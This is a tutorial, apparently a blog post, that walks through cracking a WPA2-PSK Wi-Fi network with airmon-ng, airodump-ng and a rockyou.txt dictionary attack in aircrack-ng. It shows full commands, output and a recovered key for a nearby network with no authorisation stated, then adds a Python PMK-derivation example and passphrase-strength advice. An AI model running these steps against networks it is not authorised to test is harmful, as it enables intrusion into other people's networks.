To put a wireless interface into monitor mode, use the command below. It creates a new interface (wlan1mon here) that we will use to attempt to crack a WPA2 wireless network.

┌─[root@parrot]─[/home/user]
└──╼ #airmon-ng start wlan1

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 1142 NetworkManager
 1253 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy2    wlan1           rtl8187         Realtek Semiconductor Corp. RTL8187

                (mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
                (mac80211 station mode vif disabled for [phy2]wlan1)
Now get a listing of all nearby wireless networks and MAC addresses using the new monitor interface.

┌─[root@parrot]─[/home/user]
└──╼ #airodump-ng wlan1mon

This is the output you should get: a listing of all nearby networks (ESSIDs) and their MAC addresses (BSSIDs), followed by the client stations seen talking to them.

 CH  7 ][ Elapsed: 24 s ][ 2017-07-26 01:40

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>
 E0:B9:E5:B8:31:BB  -30       29       17    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA
 FA:AB:05:96:21:1A  -61        4        0    0   1  54e  OPN              Telstra Air
 FA:AB:05:96:21:1B  -62        4        1    0   1  54e  OPN              Fon WiFi
 F8:AB:05:96:20:19  -62        9        0    0   1  54e  WPA2 CCMP   PSK  Telstra962013
 E0:B9:E5:6E:D3:69  -59       36       49    2   6  54e  WPA2 CCMP   PSK  Telstra6ED369
 C4:EA:1D:6A:65:D7  -64       14        0    0   1  54e  WPA2 CCMP   PSK  Telstra6A65D7
 FA:AB:05:CF:98:E2  -64        9        0    0   6  54e  OPN              Telstra Air
 F8:AB:05:CF:97:E1  -65        9        0    0   6  54e  WPA2 CCMP   PSK  TelstraCF97DB
 FA:AB:05:CF:98:E3  -65       12        0    0   6  54e  OPN              Fon WiFi
 C6:EA:1D:6C:4D:34  -66        2        0    0   6  54e. OPN              Fon WiFi
 C4:EA:1D:6C:4D:31  -68        2        0    0   6  54e  WPA2 CCMP   PSK  Telstra6C4D31

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:25:00:FF:94:73  EE:3F:54:D9:F1:03  -16    0 -12    101       37
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -36    0 - 1      0        1
 FA:AB:05:96:21:1B  C4:42:02:8F:BC:58  -69    0 - 1e     0        5
Now we focus on one wireless network (its BSSID and channel) to capture a WPA handshake, which is exchanged whenever a client connects to the network. The --write option stores the capture in files prefixed "password".

┌─[root@parrot]─[/home/user]
└──╼ #airodump-ng --bssid E0:B9:E5:B8:31:BB -c 11 --write password wlan1mon

And I was successful: the WPA handshake text tells me that I have captured a 3-way handshake.

 CH 11 ][ Elapsed: 2 mins ][ 2017-07-26 01:48 ][ WPA handshake: E0:B9:E5:B8:31:BB

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 E0:B9:E5:B8:31:BB  -21 100     1685      466    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -30   1e- 1      0       54
 E0:B9:E5:B8:31:BB  F0:25:B7:FA:01:4A  -32   1e- 1e     0       22
Now it is time to crack the capture file (password-01.cap). Use a very large wordlist if you are not sure what the password is. This is a dictionary attack, so it will not work unless the password is in the wordlist.

┌─[root@parrot]─[/home/user]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

And I was successful. The WPA2 pre-shared key was cracked easily. This is easier if there are a lot of users on the network constantly connecting, as that makes capturing a key easier.

                                 Aircrack-ng 1.2 rc4

      [00:00:00] 24/7120716 keys tested (870.89 k/s)

      Time left: 2 hours, 16 minutes, 24 seconds                  0.00%

                           KEY FOUND! [ debian589547FFG ]


      Master Key     : 81 B4 24 04 9A 4B 3B D3 15 D6 D6 46 92 3C 9E 1B
                       24 3E 47 47 F7 74 B6 F2 40 E8 A3 26 ED 36 79 CF

      Transient Key  : 41 87 8E 9A 9B 95 83 7A 15 B6 6C 31 9B DA 64 34
                       57 BD 01 19 7C E5 6D 25 C0 61 00 1E 50 51 9D 6A
                       AB 7F 30 A9 FE D7 42 32 CB E9 D5 08 5A D8 FE FC
                       D5 2A 28 77 C2 9A 2F 97 70 D0 87 44 A7 60 0E 49

      EAPOL HMAC     : 4F 40 BA D7 D7 02 87 57 B8 AA 63 02 7D B7 F4 72
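The "Master Key" aircrack-ng prints is the WPA2 Pairwise Master Key, which IEEE 802.11i derives from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32-byte output); every candidate in the wordlist costs the cracker one such derivation, which is why the run above manages only a few hundred keys per second. The added example below (not part of the original post or of aircrack-ng) reproduces that derivation, checks it against the published 802.11i test vector for passphrase "password" and SSID "IEEE", and uses the rate and wordlist size reported above to compare how long the dictionary takes to exhaust versus a random alphanumeric passphrase. The helper names and the 12-character passphrase length are my own choices.

```python
import hashlib

# IEEE 802.11i (Annex H.4) derives the Pairwise Master Key (PMK) of a WPA2-PSK
# network as PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
# aircrack-ng labels this value "Master Key" once the passphrase is found.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte PMK for a WPA2-PSK passphrase and SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Worst-case time to test every candidate passphrase at a given rate.

    aircrack-ng's "k/s" figure is keys (candidate passphrases) per second:
    7,120,716 candidates at 870.89 k/s is about 8,176 s, matching the
    "2 hours, 16 minutes" it reported.
    """
    return candidates / keys_per_second


def random_passphrase_space(alphabet_size: int, length: int) -> int:
    """Number of distinct passphrases of a fixed length over an alphabet."""
    return alphabet_size ** length


def format_duration(seconds: float) -> str:
    """Human-readable duration for comparing dictionary vs. random-passphrase cost."""
    years = seconds / (365.25 * 24 * 3600)
    if years >= 1:
        return f"{years:,.0f} years"
    hours, rem = divmod(int(seconds), 3600)
    minutes, secs = divmod(rem, 60)
    return f"{hours}h {minutes}m {secs}s"


if __name__ == "__main__":
    # Constructed check against the IEEE 802.11i-2004 Annex H.4.1 test vector
    # (passphrase "password", SSID "IEEE").
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())

    # Figures taken from the aircrack-ng run above: candidate count and measured rate.
    rate = 870.89
    print("Whole wordlist:", format_duration(seconds_to_exhaust(7120716, rate)))

    # A random 12-character passphrase over 62 alphanumerics at the same rate
    # (hypothetical length chosen for the comparison).
    space = random_passphrase_space(62, 12)
    print("Random 12-char alnum:", format_duration(seconds_to_exhaust(space, rate)))
```

The comparison is the defensive takeaway: the attack is bounded by how many PBKDF2 derivations per second the attacker can afford, so a passphrase that is not in any wordlist and is long enough that the search space dwarfs that rate is what actually protects a WPA2-PSK network. Changing the SSID away from a vendor default also helps slightly, because precomputed PMK tables are only valid for the SSID they were built against.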